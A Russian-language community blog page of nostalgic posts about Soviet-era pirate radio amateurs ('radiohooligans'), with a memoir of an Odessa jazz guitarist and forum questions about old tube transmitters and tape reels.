Для них джаз это было всё, они родились с джазом. Года три пели, потом Фред и Яша уехали за границу, квартет распался. В этой джаз-банде все люди состоялись. Пожалуй за исключением Сергея.
Сейчас дико звучит, но джаз до 1964 года был под запретом. Только с приходом Брежнева пошли послабления, появились пластинки, да и то за ними приходилось ездить в Кишинёв.
Потом в начале 80-х Сергей работал на заводе "Эпсилон" в радиоузле.
Там же работал и А.Карпуля. Они снова участвовали в джаз-оркестре, Сергей как всегда играл на акустической гитаре. Руководил командой Веня из Кишинёва. Где его теперь найдёшь этого Веню.
С.Дарьян был сильнейшим расказчиком анекдотов, особенно любил конечно же еврейскую тему.
На юбилей Одесского университета они выступали в знаменитом Одесском оперном театре. Это выступление потом показывали по ЦТ Москвы, невероятно. Сергея видела вся страна.
В те времена после концертов многие женщины готовы были лечь в постель только из-за уважения к музыкантам и любви к музыке. Деньги не играли никакой роли.
Несколько раз Сергея приглашали выступать на теплоходных круизах по Чёрному морю.
Если проследить места самодеятельных выступлений Сергея, то получается такая картина. Пел он на маршруте пятого трамвая, который как раз и шёл с Молдованки. Сначала на Ланжероне (туда можно было добраться и 28 трамваем), потом на пляже Отрада и в конце на "Малом фонтане".
Развал страны в 1991г. застал Сергея уже на другом адресе, на ул.Гайдара, жили вдвоём с матерью. Лариса приходила туда, она очень хорошо относилась к отцу, помнила ведь только хорошее. Сергей уже практически не работал, так иногда по чуть-чуть в охранах. В разговорах с Ларисой говорил, что жизнь удалась, что всем доволен. Но его мать, когда не было Ларисы, видела как он плакал. Дома пел на гитаре, рисовал, но уже никуда не приглашали.
Когда умерла мама и родня продала квартиру, Сергею купили коммуну (комнату в коммуналке). Начались самые тяжёлые дни его жизни. Лариса туда тоже приходила, помогала как могла, но у неё своя семья. Тут я пропускаю несколько моментов, скажу только, что не было у него тогда даже гитары.
И вот осенью 2004 года соседи обнаружили труп на кухне...
Похоронен на самом старом одесском кладбище - Слободском.
А ведь я до 2004 года три раза был в Одессе, может и проходили мимо друг друга, только я не знал что это он - "Сидю на заборi".
Любил Сергей очень музыку, а свадьбы и рестораны всё попортили. Вроде бы и было их четыре друга, но у каждого свой мир. Двое уехали и он остался сам с собой. Второй раз не женился. Была некая Люда, лет пять, но всё не то.

Видео сюжет: О радиохулиганах

настроение: бодрое
хочется: пива
слушаю: думаю

Метки: радиохулиганы

NIKON RUS, 26-09-2012 23:32 (ссылка)

Всем свободным или Дальних связей и безопасной работы!

Всем свободным.
Этот запрос посылаемый долгие годы в эфир был нашим лозунгом СВОБОДЫ в не свободной стране.
За эту свободу приходилось расплачиваться годами лагерей, конфискованной аппаратурой и нелегальным положением.
Но это мы терпели от системы страны советов. Даже  эта суровая система не смогла сломать наших коллективов.
И сейчас включив приёмник  ещё можно слышать старую гвардию.
Надеялся увидеть здесь уголок этой свободы вне зависимости от наличия лицензии.
Но когда удаляют твои сообщения из раздела то о каких радиохулиганах СССР здесь может идти речь, если тебе перекрывают частоту.
Это уже проходили, там, в СССР.
Так что. Всем Свободным, Ромашкам,Антифризам,Рабиновичам,Сержантам,Чёрным,Лучам,Никотинам,Малышам,Киловаттам,Калинам...
Дальних связей и безопасной работы!
Частота за Вами.
В других местах нас не ждут.

Без заголовка

помогите как зделать шарманку не получаеться

Lion V, 29-07-2012 20:01 (ссылка)

Это не забыть!

Да,и как будто вчера это было,после просмотра сообщества. Спасибо создателям,здорово! Хотелось бы чтобы почаще заходили сюда ребята,общались. Очень приятно будет побеседовать,вспомнить. Я начинал в самый разгар. Крутил батин приемник, Балтика, и услышал работу радио хулиганов. С этого момента меня как током ударило. Сам я занимался уже радио делом. Достал приемник Урал-57,без корпуса,немного доделал и пошло. Собрал на столе схему на 6П3 конечно,антенну на крыше навесил,метров 20 проволоку. Включил - руки дрожат,первую связь так и запорол.А какой адреналин!!! Прибегу со школы и в эфир,какие уроки!? пока отец на работе шарманил,потом все опять распаивал и по шкафам прятал,он у меня разбирался в радио,это его заслуга,что я всю жизнь посвятил электроники. В армии радистом был в.ч.28181.Работал потом в экспедиции радистом. Позывной был UL7OBQ потом UN7OK,сейчас не работаю.Нет условий да и интересы сменились и по профессии связан с компьютерами. Начинал я в Орджоникидзе,теперь Владикавказ.Сейчас живу в Казахстане. Но душой прикипел к эфиру,особенно к тем годам 65-70.

А.Милкин.Иволга




Метки: А.Милкин

Видео: Вячеслав Караулов - Ностальгия

настроение: бодрое
хочется: будем жить!

Метки: радиохулиганы

Видео: Александр - Королева


настроение: бодрое
хочется: будем жить!

Метки: радиохулиганы

Видео: Владимир Ледовских г.Тамбов - Каштаны;Аленка и др. песни




настроение: бодрое
хочется: будем жить

Метки: радиохулиганы

Видео-Живой эфир 2012 г.- 5й район

Метки: ПРИСУТСТВУЕТ НЕ НОРМАТИВ !

Вспомнишь лампу 6П3

Вспомнишь лампу 6П3




Запись с магнитафона (Решил поделиться)

Раскапывал вновь появившиеся катушки ...
и обнаружил среди ленты , вот такую запись..повидимому пробник , так как консультировался с местными эфирщиками ...никто его незнает ..повидемому что то несложилось ...,но очень радостно слышать,тем более что записи уже за 20ть лет!!!)))может кто откликнеться???))




а это уже просто эксклюзив !!!не могу удержаться чтоб не показать фотку моего друга с Однокласников !!!Юрки!!!!
многие просто себя вспомнят)))

Магнитофон "ВЕСНА-3"

Скажите пожалуйста уважаемые, какие катушки использовались в магнитофоне "Весна-3" Я не помню номера катушки но по моему туда влазило 180 или 150 метров пленки ТИП-6 и 270 метров ТИП-10, или я что то напутал? На ТИП-10 на одну сторону на скорости 9 по времени 45 минут, (1 большая пластинка). А вот катушки которые были немного больше были нестандартными, и на тих постоянно что то дописывали (вроде одна сторона пластинки умещалась на дозапись), так как оставалось много свободного места, следующий размер был 525 метров ТИП-10 на одну сторону на 19 скорости времени 45 минут. Но меня больше интересует "Весна-3" 

Что на 3мГц сегодня

Слушал сегодня на даче в 9 часов вечера на перестроенный ВЭФ-202,записал на МР-3 плеер.Не думал что услышу кого либо в столь раннее время.Антенна кусок провода.


В этой группе, возможно, есть записи, доступные только её участникам.
Чтобы их читать, Вам нужно вступить в группу